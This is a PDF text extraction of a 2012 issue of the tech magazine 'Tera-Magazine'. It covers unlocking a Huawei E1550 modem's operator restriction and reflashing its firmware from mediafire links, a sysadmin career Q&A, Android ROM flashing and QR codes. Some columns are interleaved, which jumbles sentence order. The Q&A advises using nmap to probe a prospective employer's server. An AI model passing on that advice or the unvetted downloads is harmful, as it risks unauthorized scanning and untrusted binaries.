nombre de modèle de différents constructeurs Alcatel, ZTE… Il est simple à utiliser et très perforLe modem sujet de notre labo est mant doté d’une interface riche d’opHuawei E1550 : Il s’agit d’un modem qui supporte un tion que nous allons découvrir par la débit de 3.6 mbps. Ce modem qui peut suite. vous coûter >100 dh est un modem crée Étape 2 par l’équipementier chinois Huawei Vérifier que votre modem est bien pour les opérateurs marocains. détecté par votre ordinateur et que son driver est installé. Soit vous instalSTART : ler les drivers usine : Download Huawei E1550 Driver Part1 : Flasher et libérer votre (http://www.dc-files.com/files/huawei/ modem 3G : modems/Varies/driver/Huawei_Driver. Cette opération s’effectue lorsqu’ zip) ou vous contentez des drivers fouron veut casser la restriction imposée nies par l’opérateur. Maintenant, il vous reste que suivre par l’opérateur d’origine qui fait que le modem n’accepte que la puce de ce les démarches suivantes pour réussir dernier. Cette restriction n’arrange pas l’opération les utilisateurs qui ont d’autres puces Étape 3 des autres opérateurs. Pour s’en débarDans cette étape on configure notre rasser nous procédons au flashage du modem. L’opération est simple à effec- logiciel. On commence par récupérer tuer et ne met pas en danger votre des informations système pour que le appareil. Je vous présenterai le moyen logiciel détecte notre modem. On choisie l’onglet PORT SETTING : le plus facile et le plus efficace pour 31
32
Une interface se présente pour sélectionner le port de communication avec le modem. On choisie entre ‘port modem Two’ ou ‘one’ pour le port mode celui qui a une liste des ports
sur le bouton système propriétés et on choisissant le ‘device manager’. On navigue dans ce dernier jusqu’au ‘port COM’ pour savoir sur quel COM le modem est actif. Dans cette manip j’ai le COM 15 Je retourne dans logiciel ‘ GSM Multi Hub ‘ et j’indique la valeur COM15 dans le champ du port opérationnel.
Étape 4 :
Tout est prêt pour flasher et libérer (unlock) votre appareil. On choisie l’onglet ‘Code calc’ et le modèle (huawei). On choisie le type du modem qui est ici le E1550 ensuite pour vérifier que le logiciel communique avec le modem on clique sur modem info. Le logiciel récupère tout seul toutes les informations nécessaire (IMEI..) et il calcule les codes nécessaires. Ensuite un simple clique sur ‘unlock modem’ vous suffira opérationnels non vide. NB: Cette interface contient un message religieux mis par le réalisateur chrétien. Pour choisir quel port de communication on fait appel au gestionnaire des périphériques (Fig3) et ceci en cliquant
pour terminer l’opération avec succès. Félicitations votre modem est libre !!
www.Teramagazine.tk
2012
Fig3 .
32
Tera-Magazine
Tera-Labo
Part 2 : Mise à jour de l’interface « internet Mobile » Si vous êtes un client IAM,INWI.. et vous utilisez E155 ou un modem similaire, vous êtes donc familier avec l’interface d’utilisation (Dashboard en Anglais) présentée dans la figure 7. Celle-ci est limitée car elle présente un menu basique qui gère la connexion Internet. Pour faire une comparaison, l’interface d’origine est présentée dans la figure 6. On remarque l’apparition des opérations : Call log, envoie et réception des MMS… qui ne figurent pas dans le logiciel offert par IAM. Cette interface (la version modifiée) est installée à partir
Fig.6 : interface offerte par le constructeur Hu
Ces fonctionnalités ne sont utiles que pour les abonnés au forfait mobiles et internet mais ça n’empêche pas de mettre à jour votre modem pour le remettre à la version complète. Notre intervention touche donc les 2 niveaux : l’interface d’utilisation et le firmware pour les remplacer par les originaux ou une version récente offerte par le constructeur et non par l’opérateur. Fig.7 : interface offerte par l’opérateur
du modem qui la contient sous forme de logiciel embarqué (firmware).
BUT :
Nous comptons désormais activer la fonctionnalité des appels audio vidéo l’envoie et la réception des MMS sur son modem qui sont comme malheureusement désactivé par l’opérateur. 33
Fig.8: Firmware IAM
uawei
34
Passons à l’action : Étape 1 :
Tout d’abord, il faut connaître la version dont on dispose, soit celle du firmware soit celle de l’interface d’utilisation. Pour le faire, consultez l’onglet
Fig.9 outils et lancez “diagnostics” qui vous montre une interface qui présente les informations concernant votre modem. Dans mon cas la version de l’interface fournie par IAM est la 21.005.15.05.162 pour activer les appels par modem nous allons installer la version 16.001.06.01.500 qui est plus récente. Je signale qu’il n’est pas nécessaire de désinstaller l’interface (‘Internet Mobile’) offerte par IAM la nouvelle peut être utilisée même en sa présence.
Fig.10
34
Tera-Magazine
Tera-Labo
Etape 2 :
Mise à jour de l’interface d’utilisation • Téléchargez et installez le logiciel Huawei Mobile Partner, il fonctionne sur Windows XP, Windows Vista et Windows 7 ainsi. Ensuite lancez-le. Voici le lien de téléchargement: http://www.mediafire. com/?m26xitgu27939is
Étape 3:
• Après l’installation, configurez le profil d’utilisation pour pouvoir se connecter au modem et essayez de vous connecter à Internet (Fig.11)
Part 3 :Mise a jour du Firmware
On a recours à cette opération si vous voulez changer les fichiers d’installation qui sont gravés dans la mémoire interne de votre modem, par un firmware plus développé. Dans une installation antérieure, c’est la nouvelle interface qui s’installera avec les fonctionnalités étendues et non celles de l’opérateur.
Étape 1 :
Téléchargez “Huawei E1550 Firmware Update” disponible sur le lien : http://www.mediafire. com/?xqhysbe9aowa832
Étape 2:
Je vous propose la dernière version mise à jour du firmware du mode «huawei 3g usb 1550 e» , totalement gratuite à télécharger. Vous pouvez aussi utiliser cette version si vous avez des problèmes avec l’ancien firmware. Vous pouvez également utiliser cette option mise à jour, lorsque votre modem ne semble pas fonctionner correctement.
Avertissement Fig.11.
Important!! Vous pouvez utiliser la nouvelle interface utilisateur pour profiter de votre modem sans faire une mise à jour du firmware inclus dans le modem. Cette étape reste importante car, si vous pensez à faire une mise à jour il faut la faire avec une version qui marche bien avec votre modem. Donc, si vous êtes satisfaits du résultat obtenu vous n’êtes pas obligé de continuer la suite 35
vous allez flasher votre modem Huawei avec cette nouvelle version. Les paramètres actuels de votre profil de connexion seront perdus à cause de la nouvelle mise à jour. N’oubliez pas de mettre à jour le firmware d’un ordinateur avec une source d’alimentation stable. Parce que si votre ordinateur s’éteint lors de la mise à jour du firmware (qui prendra 5 ~ 15 minutes) le firmware de votre modem sera endommagé. Assurez-vous donc que vous avez une source d’alimentation à utiliser avec votre ordinateur.
36
La procédure est simple. Il suffit de télécharger et exécuter le ‘firmware update wizard’ pour huawei usb modem 3G 1550.(Fig.12) Après que la recherche et la détec-
Fin
En terminant cette simple opération, vous aurais un modem huawei avec le dernier firmware à son intérieur. Enfin notre cadeau aux lecteurs de Teramagazine c’est l’interface graphique et le driver pour gérer votre modem huawei sous linux. http://www.mediafire.com/?j3a63cq1p4847tp N’hésitez pas à nous envoyer vos feedbacks et vos commentaires vis à vis ce Labo.
Important!!
Fig.12
Faites attention, une interruption de la mise à jour peut causer des problèmes de fonctionnement de votre modem.
Fig.13
www.Teramagazine.tk
2012
tion du modem soient terminés, la mise à jour demande une confirmation, acceptez-la, au bout de quelques minutes votre modem sera à jour firmware.
36
Met
ier
Tera-Labo
de l’av eni
r
Le métier d’un Administrateur des systèmes : >> SYSADMIN
S
i vous voulez devenir un administrateur système,alors vous êtes entrain de lire le bon article. Je propose une série d’articles dans laquelle je compte vous initier à mon métier en tant qu’administrateur système Linux (opensue/Débian). Durant mon contact avec les étudiants ou mes stagiaires, beaucoup d’entre eux montrent l’envie et l’enthousiasme pour devenir des administrateurs système «Linux». Je dis beaucoup et non la ma jorité car il existe ceux qui préfèrent le soit disant confort de Windows Server :), Sans doute une conclusion due aux erreurs pédagogiques. Je vais lister l’ensemble de questions qu’on me pose et mes réponses que je vois intéressant de partager vue qu’elles montrent les préoccupations des nouveaux recrues dans ce domaine.
Q
Comment trouvez-vous votre travail ? En deux mots je dirais amusant et très technique. Je m’amuse à résoudre les problèmes et d’apprendre chaque jour une nouvelle chose même si je suis dans ce job ça fait des lustres !. Un travail technique dans la mesure ou L’administration système demande beaucoup de connaissances surtout qu’on a souvent affaire en parallèle à d’autres domaines tels que la sécurité informatique, la gestion des réseaux, hardware, etc. Si vous n’avez pas de chance votre mission d’administrateur peut devenir difficile surtout si vous avez un grand parc à gérer en tant que débutant.
Q 37
Je veux devenir un administrateur système Linux. Devrais-je essayer de se spécialiser dans une distribution
Linux particulière? Je Crois que vous serez plus apte au travail en tant que généraliste qu’un spécialiste, surtout si vous êtes débutant mais cela dépend de votre situation. Si vous faites une demande pour un emploi dans une entreprise connue pour être à l’aide de SUSE. Mais si vous n’avez pas une position spécifique dans l’esprit, mais vous préférez se concentrer sur une distribution, je vous conseil Red Hat Enterprise Linux. Une astuce que je vous donne c’est de faire une collecte de donnée sur le système hôte du site web de l’entreprise. Il y’a de grand chance que ce dernier soit hébergé dans l’un de leurs serveurs interne et par conséquent vous saurez quelle distribution est utilisée chez eux. Pour le faire utiliser nmap.
Tera-Magazine
Q
Je suis un habitué aux outils GUI de Windows. Dois je obligatoirement apprendre à utiliser les outils en commandes et les scripts pour administrer Linux ? En un mot, oui. Il est probablement vrai que sur une distribution Linux moderne, vous pouvez effectuer un bon nombre de tâches d’administration classiques, tels que la création de comptes d’utilisateurs et l’installation d’un nouveau logiciel en utilisant un outil graphique. Tôt ou tard, ces outils vont s’essouffler, et vous verrez que la ligne de commande est la seule façon d’aller. Par exemple, je ne connais pas de méthode pour fixer des quotas disques par utilisateur, sauf par ligne de commande. Il existe au moins trois autres raisons de se familiariser avec la ligne de commande. Apprenez à aimer la CLI Tout d’abord, les connaissances en ligne de commande sont plus
38
vos serveurs ne disposent pas d’écrans ni d’interfaces graphiques.
Q
Comment puis-je commencer?
Bonne question, vous avez à exercer. Il y a beaucoup de façons d’obtenir une machine pour s’ entraîner. Vous pouvez télécharger un CD ISO d’une distribution (Redhat,Centos, Suse..). Vous pouvez débuter avec Ubuntu si c’est le premier contact avec Linux. Vous pouvez les installer sur du matériel réel, ou à l’intérieur d’une machine virtuelle telle que VMWare ou VirtualBox (libre et gratuit) sur des hôtes Windows (Fig1). Essayez de mettre en place deux machines de sorte que vous pouvez jouer avec la mise en réseau. Ensuite, il suffit de’ bricoler’: testez les commandes linux, créer de simple scripte, mettre en place un serveur web, configurer un pare-feu, essayer de manipuler les fichiers de configuration etc. Amusez-vous.
Q
Pourriez me donnez un exemple pratique ou une tache que fait l’admin system, les outils utilisés?
susceptibles d’être transférables entre les distributions linux, alors que les outils graphiques ont tendance à être spécifiques à la distribution. Deuxièmement et c’est le plus important, il y a une bonne chance que beaucoup de
www.Teramagazine.tk
2012
Fig.1: RHEL 5 en VirtualBox
Les administrateurs sont face à de nombreux problème dont le premier est ‘comment puis-je accéder aux serveurs distants que je suis censé administrer?. Car La plupart des temps ils n’ont pas un accès physique aux machines qu’ils gèrent surtout si le parc informatique est éparpillé. En effet, beaucoup d’entre eux ont des machines Linux/Windows sur leurs ordinateurs de bureau et s’appuient sur des outils d’accès à distance. Pour accéder à l’invite de commande sur leurs serveurs, les administrateurs utilisent généralement le shell sécurisé (SSH). La plupart des distribu38
Tera-Magazine
Métier de l’avenir tions Linux installe et activer le démon sshd par défaut, souvent, c’est le seul service qu’on exécute après une installation d’un serveur Linux. Si le poste client (celui du bureau de l’admin) fonctionne sous Linux alors il a presque certainement le client SSH installé, >>La magie de SSH Si l’ordinateur client exécute Windows, il n’a probablement pas un client SSH installé par défaut. Les administrateurs utilisent le plus souvent l’outil putty (www.putty.org). Il y’a aussi Cygwin, qui est une étonnante collecQ tion d’outils Linux pour Windows, y compris SSH. Pour commencer avec Cygwin, téléchargez-le et exécutez le programme d’installation à partir www. cygwin.com. Le programme d’installation vous permet de choisir les pièces de Cygwin que vous voulez installer. Putty et Cygwin sont disponibles gratuitement. De mon côté Je préfère Cygwin car ressemble à un client SSH Linux.
ler un serveur VNC sur la machine distante. Celle-ci se présente à toutes les applications graphiques fonctionnant sur cette machine en tant que serveur X normal. Nous allons chercher un package approprié: Yum search vnc (Centos,Fedora..) Vous pouvez l’installer avec: Yum install tigervnc-server Maintenant que le paquet est installé, vous pouvez chercher n’importe quel tutoriel pour apprendre à utiliser et à configurer VNC.
Quelles sont les commandes de base que je dois savoir? Il existe des outils classiques (ps, grep, traceroute, ..) que les administrateurs utilisent. Vous aurez besoin de lire les pages de manuel de ces commandes.
.... Et graphique Si vous souhaitez accéder à un environnement de bureau complet sur vos serveurs, il existe plusieurs options; Le mécanisme de fenêtrage Linux (X Window) est une architecture client / serveur. Donc, une façon d’accéder à distance à un ordinateur Linux est d’exécuter les outils graphiques d’un serveur X sur votre Windows. Pendant de nombreuses années, Hummingbird Exceed étais le produit populaire sous Windows. Il y’a aussi Sming. Cependant, leurs mise en place n’est pas toujours facile. Une autre solution plus facile consiste à utiliser une technologie de visualisation de bureau à distance tel que VNC. Pour utiliser VNC, vous devez instal39 Fig.2
40
Comme un début je vous recommande les commande listées dans la Fig.2 (vous pouvez l’utiliser comme fond d’écran) :
Je ne suis pas bon en anglais est-ce un problème ? Vous devez avoir un bon anglais pour lire la documentation. Mais ne vous inquiétez pas l’anglais technique est facile à apprendre.
Q
Le mois prochain, nous allons apprendre à configurer les paramètres réseau de nos machines, la mise en place des adresses IP, DNS, routage, etc. Ainsi que les outils de gestion des ces services. ne ratez donc pas la suite.
Y-a-t’il des problèmes courants avec le milieu du travail? Le sysadmin est-il isolé? Isolé non, mais plutôt indépendant. Les problèmes on n’en manque pas surtout avec les non informaticiens le dessin comique suivant peut vous donnez une idée.
www.Teramagazine.tk
2012
Q
Mois Prochain
40
Android
Hack your Android phone
… to longer battery life, faster performance and better apps
How to start hacking your Android phone, and which ROMs you need to install
F
or the tech enthusiast the ability to install custom ROMs is one of the great bonuses that comes with owning an Android phone. You buy your phone, use it for a while as the manufacturer intended, then, after the newness factor has worn off, you start hacking it to make it work exactly how you want it to. When you flash a new ROM to your phone you are replacing all of the software that was on it with something new (the same thing as we saw in the Tera-Labo). The entire OS id wiped and a new version installed. Sometimes this might be a similar version to what you had before, but tweaked to make it faster or introduce a few new features. Sometimes the new ROM might remove the customizations that the manufacturer added to help differentiate its product from the rest of the market. And sometimes a new ROM can bring you a new Os altogether. The rollout of the new versions of the Android Os to older handsets is notoriously slow, and the custom TOM route is very often the quickest way to keep your phone up to date. 41
Taking the custom ROM route does not come without a few implications. The main being the effect on your phones then it goes without saying that you won’t be able to get support from the manufacturer or your network should you encounter software problems, or hardware problems caused by software issues, such as problems with the app. Likewise, if your phone fails to boot during the flashing process you’ll need to fix it yourself(but there is excellent community support and our Tera-team that will help you). The warranty issue with regard to hardware issues is less clear. Physical problems with your phone that have no connection to software, such as the USB port coming loose, ought not to affected by rooting and flashing. As a general rule if you can return your phone to its locked, unrooted state, then you should do so before you make a claim on the warranty. In order to flash a custom ROM you will need to have done two things on your phone. First you need to have rooted it (you can read about phone rooting in a previous topic in tera-mag-
azine). This is the process that gives you ‘root access’ to your phone’s OS. Second, you will need to have unlocked the device’s bootloader. The bootloader controls what happens when the phone boots up. If it is locked when it encounters ‘unauthorized’ software, such as a custom ROM, it will prevent the phone from booting. If it is unlocked then it will allow this software to run. Most rooting procedures normally encompass unlocking the bootloader at the same time. After rooting your phone you’re ready to flash your ROM. The question now is where do you find them, and which one should you choose. ROMs are generally split into two groups. There are those based on AOSP (the Android Open Source Project) and present a ‘pure’ version of the Android experience; and there those that are device specific, based on the device’s own ROM, but tuned or streamlined for a particular purpose. For the first question, there are many sources online for ROMs. The forums at xda-developpers.com are the primary source, with sections dedicated to virtually every handset. Most ROMS are designed for specific handsets, but three are a few that are widely available for multiple devices, including CyanogenMod, AOKP and Miui, and if you choose those you’ll find websites specific to their development (and community forums providing sup-
port). These multi-device ROMs represent the best starting point for the new user, and also the best place to go for a day-to-day ROM that you can install. They have the largest user base and usually deliver the best balance between performance and stability. You can find a good To Flash a ROM for your Android device http://forum.xda-developers.com/wiki/index.php?title=Flashing_Guide_-_Android In the next Tera’s labo we’ll inshalah use an HTC or a Samsung phone to hack it and install a new ROM. We are waiting for your feedbacks!
A new ROM can change the look and speed of any phone
Flashing a new ROM
42
رمز االستجابة السريع أو الرمز المربع تقديم
رمز االستجابة السريع أو الرمز المربع أو : Quick Response codeباإلنجليزي إختصاراً )( QR code هو نوع من مصفوفة الشفرات الخيطية أو الباركود (أو الرمز الثنائي األبعاد .يتكون الرمز من وحدات سوداء مرتبة على شكل مربع على خلفية بيضاء تحتوي المعلومات المشفرة يمكن تخزين أي نوع من البيانات الرقمية العنوان URL ,العنوان على شبكة اإلنترنت ,األرقام ,وما إلى ذلك ..يمكن فك رموزه بواسطة الهاتف المحمول المزود بكاميرا أول استخدام له كان في تصميم صناعة السيارات من قبل شركة دنسو التابعة لشركة تويوتا وذلك في عام 1994لتعقب المركبات أثناء عملية التصنيع. وفي اآلونة األخيرة ،إنتشر هذا النظام خارج نطاق الصناعة بسبب سهولة القراءة بشكل سريع ونسبة التخزين العالية .أصبحت استخداماته في مجاالت واسعة :مثل التتبع التجاري ،تذاكر النقل والترفيه ،تسويق المنتجات وتعريف أسعار المنتجات والكثير من هذه التطبيقات تستهدف مستخدمي الهاتف المحمول
كيف يمكنك إنشاء Qr code
بإمكان المستخدم توليد وطباعة رموز لآلخرين ويتم ذلك من خالل زيارة واحدة من العديد من مواقع أو تطبيقات توليد رموز االستجابة السريعة المدفوعة أو المجانية .يمكنك باستخدام موقع مثل Kaywa.com بسهولة توليد رمز QR كما يمكنكم استعمال تطبيق Qr barcode scanner المتوفر لهواتف اندرويد
كيفية قراءة الرمز المربع بهاتفك المحمول؟
لقراءة الرمز المربع ،يجب أن تجهز هاتفك الجوال ببرنامج مناسب مناسب لطراز الهاتف الخاص TOURIA NHASS TÉCHNICIEN SPÉCIALISÉ EN RÉSEAU
الرمز المربع
QR Codes =Tera-magazine
بك اي فون Iphone يمكنكم العثور على برامج عديدة من بينها تطبيق المجاني Barcodes http://itunes.apple.com/fr/app/barcodes أندرويد Android Qr barcode scanner برنامج فعال و مجاني يقدم العديد من المميزات موجود ب googleplay
منافع الرمز المربع
مثال حديث إلستعمال رمز QRهو المساعدة على إيجاد المفقودات .الفكرة يقدمها موقع www.findercodes.com
حيث يقدم لك رموز خاصة بك و في حالة ضياع متاعك يمكن لمن وجده و بفضل قراءة الرمز يتمكن من التعرف عليك و اإلتصال بك كما توضح ذلك الصورة أسفله
أنصحكم بتجربة هذه التقنية المفيدة و الممتعة على حد سواء كما أشير الى وجود تقنيات االسهل و األكتر QRمشابهة لكن تبقى رموز انتشاراً
43
Quize
Participez et gagnez deux USB
8Go :
Quelle est la fonction en Java/c#/c++ que si on l’applique à la chaine tera donne ‘tera’ ? Envoyer vos réponses à tera.revue@gmail.com pour participer à la tombola
la recherche sur internet est interdite.
la manette de jeu. Elle vibre et ne sonne pas :). Seulement 4 réponses reçus étaient correctes !!!!!!!!
La réponse au Quize précédent =
44
Tera-Magazine
Smile Space
Laissez-nous votre Mail sur le site : Teramagazine.tk pour recevoir les prochains numĂŠros de TERAMAGAZINE.os
45
46
HĂŠ,
>>>Rejoignez-nous sur Facebook : www.facebook.com/tera.maga www.Teramagazine.tk
2012
Vous!
46
Twitter & Facebook Dans le monde arabe
47
48
Pour nous suivre et nous Contacter
@terarevue
ra.ma e t / om ook.c
ga
faceb
.com
ail @gm
evue r . a r Te
http://goo.gl/jwYF0
/
om c . t po
s
log b . ine
z
a ag
m
ra e ://t
tp ht
votre soutien est important pour nous 49